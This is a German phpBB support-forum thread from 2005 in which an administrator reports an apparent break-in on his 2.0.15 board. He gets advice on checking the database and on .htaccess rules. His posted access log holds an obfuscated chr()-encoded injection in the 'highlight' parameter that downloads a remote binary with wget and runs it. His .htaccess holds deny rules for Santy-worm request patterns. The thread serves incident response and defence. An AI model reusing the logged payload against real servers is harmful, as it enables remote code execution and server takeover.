Hilfe - wurde gehackt 2.0.15

maxl · Beitrag von **maxl** » 27.05.2005 15:05

Mein Forum (2.0.15) wurde offenbar gehackt!

Mein Provider hat meinen Account vorübergehend deaktiviert, da offensichtlich über ein Skript von phpbb der Server stark überlastet wurde.

In den Logfiles hab ich folgenden Eintrag gefunden:

Code: Alles auswählen

modemcable118.234-80-70.mc.videotron.ca - - [27/May/2005:01:17:15 +0200] "GET /phpbb/viewtopic.php?p=2415&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)%252echr(109)%252echr(107)%252echr(100)%252echr(105)%252echr(114)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(47)%252echr(46)%252echr(114)%252echr(48)%252echr(48)%252echr(116)%252echr(59)%252echr(32)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(47)%252echr(46)%252echr(114)%252echr(48)%252echr(48)%252echr(116)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr(118)%252echr(111)%252echr(105)%252echr(108)%252echr(97)%252echr(46)%252echr(102)%252echr(114)%252echr(47)%252echr(114)%252echr(111)%252echr(48)%252echr(116)%252echr(47)%252echr(115)%252echr(116)%252echr(111)%252echr(110)%252echr(101)%252echr(59)%252echr(32)%252echr(109)%252echr(118)%252echr(32)%252echr(115)%252echr(116)%252echr(111)%252echr(110)%252echr(101)%252echr(32)%252echr(115)%252echr(115)%252echr(104)%252echr(100)%252echr(115)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(115)%252echr(115)%252echr(104)%252echr(100)%252echr(115)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(115)%252echr(115)%252echr(104)%252echr(100)%252echr(115)%252echr(32)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2

Ich vermute, daß in der viewtopic.php ein Fehler steckt.

Bitte um Hilfe!!!

Vielen Dank

maxl

larsneo · Beitrag von **larsneo** » 27.05.2005 16:12

der von dir angesprochene highlight-fehler ist seit einigen version (2.0.11?) bereits gefixt - wichtig an dieser stelle wäre, ob dein forum wirklich gehackt worden ist oder aber ob 'nur' durch massive zugriffe auf die url ein 'denial of service' verursacht wurde. letzteres kann durch durch eine entsprechende .htaccess verhindern.

maxl · Beitrag von **maxl** » 27.05.2005 16:21

Hmm, habe alle Updates seit 2.0.6 immer brav gemacht!

Am Board selbst ist nichts sichtbar - es hat sich also niemand irgendwie als Hacker verewigt.

Lt. meinem Provider wurde der Server stark überlastet!

Eine .htaccess habe ich für den Adminbereich eingerichtet - oder meinst du da eine für etwas anderes?

Bitte um einen Tipp was ich tun muß - vielen Dank!

maxl

EDIT: habe die "modemcable118.234-80-70.mc.videotron.ca" jetzt im Board mal gebannt - ich hoffe das bringt momentan mal was!

maxl · Beitrag von **maxl** » 29.05.2005 16:04

** push **

Bitte um Hilfe!

maxl

kratzer54847 · Beitrag von **kratzer54847** » 29.05.2005 16:17

ist denn in der Datenbank noch alles in Ordnung?

maxl · Beitrag von **maxl** » 29.05.2005 17:52

kratzer54847 hat geschrieben:ist denn in der Datenbank noch alles in Ordnung?

Da bräuchte ich mal einen Tipp wie ich das überprüfen kann! Wie könnte ein verdächtiger Eintrag in der DB aussehen? (wie ich in die DB komme weiß ich schon - nur wo und welcher Eintrag ist zu prüfen?)

maxl

Beitrag von **Jan500** » 29.05.2005 17:54

zb die userliste ob außer dir noch andere user nen admin-user-level haben usw...

oder ob was in der phpbb_config table verstellt ist usw...

Jan

Beitrag von **rabbit** » 29.05.2005 19:00

maxl hat geschrieben:Eine .htaccess habe ich für den Adminbereich eingerichtet - oder meinst du da eine für etwas anderes?

schau mal hier.

kratzer54847 · Beitrag von **kratzer54847** » 29.05.2005 19:02

die Usertabelle, die Thementabelle und die Posttabellen wären in de Fall interessant!

mfg Johny

maxl · Beitrag von **maxl** » 29.05.2005 21:43

Hallo Leute!

Vielen Dank für die nette Unterstützung!

Hab jetzt mal in meiner DB nachgeschaut - es gibt da:

1) den User "Anonymous" mit der user_id: -1
2) einen ohne irgendwas (kein Name, kein Passwort) mit der user_id: 0
3) mich als Admin mit der user_id: 2
4) alle weiteren User mit fortlaufender ID

Der User 2 macht mich irgendwie stutzig, da mir der bisher noch nie aufgefallen ist!

@kratzer54847

Worauf muß ich in den Tabellen Themen und Post achten?

Nochmals Danke für eure Hilfe!

maxl

EDIT:

@rabbit & larsneo:

in meiner .htaccess im root habe ich folgendes:

Code: Alles auswählen

RewriteEngine On 

# prevent access from santy webworm 
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR] 
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR] 
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR] 
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 
RewriteRule ^.*$ http://127.0.0.1/ [R,L] 

# prevent pre php 4.3.10 bug 
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b 
RewriteRule ^.*$ http://127.0.0.1/ [R,L] 

# prevent perl user agent (most often used by santy) 
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC] 
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

RewriteCond %{REQUEST_FILENAME} /phpbb/forums.html 
RewriteRule (.*) /phpbb/index.php [L] 

RewriteCond %{REQUEST_FILENAME} /phpbb/viewforum([0-9]*)-([0-9]*)-([0-9]*).html 
RewriteRule (.*) /phpbb/viewforum.php?f=%1&topicdays=%2&start=%3 [L] 

RewriteCond %{REQUEST_FILENAME} /phpbb/forum([0-9]*).html 
RewriteRule (.*) /phpbb/viewforum.php?f=%1 [L] 

RewriteCond %{REQUEST_FILENAME} /phpbb/ptopic([0-9]*).html 
RewriteRule (.*) /phpbb/viewtopic.php?t=%1&view=previous [L] 

RewriteCond %{REQUEST_FILENAME} /phpbb/ntopic([0-9]*).html 
RewriteRule (.*) /phpbb/viewtopic.php?t=%1&view=next [L] 

RewriteCond %{REQUEST_FILENAME} /phpbb/ftopic([0-9]*)-([0-9]*)-([a-zA-Z]*)-([0-9]*).html 
RewriteRule (.*) /phpbb/viewtopic.php?t=%1&postdays=%2&postorder=%3&start=%4 [L] 

RewriteCond %{REQUEST_FILENAME} /phpbb/ftopic([0-9]*)-([0-9]*).html 
RewriteRule (.*) /phpbb/viewtopic.php?t=%1&start=%2 [L] 

RewriteCond %{REQUEST_FILENAME} /phpbb/ftopic([0-9]*).html 
RewriteRule (.*) /phpbb/viewtopic.php?t=%1 [L] 

RewriteCond %{REQUEST_FILENAME} /phpbb/ftopic([0-9]*).html 
RewriteRule (.*) /phpbb/viewtopic.php?t=%1&start=%2&postdays=%3&postorder=%4&highlight=%5 [L]

ist das O.K. oder muß ich was ändern?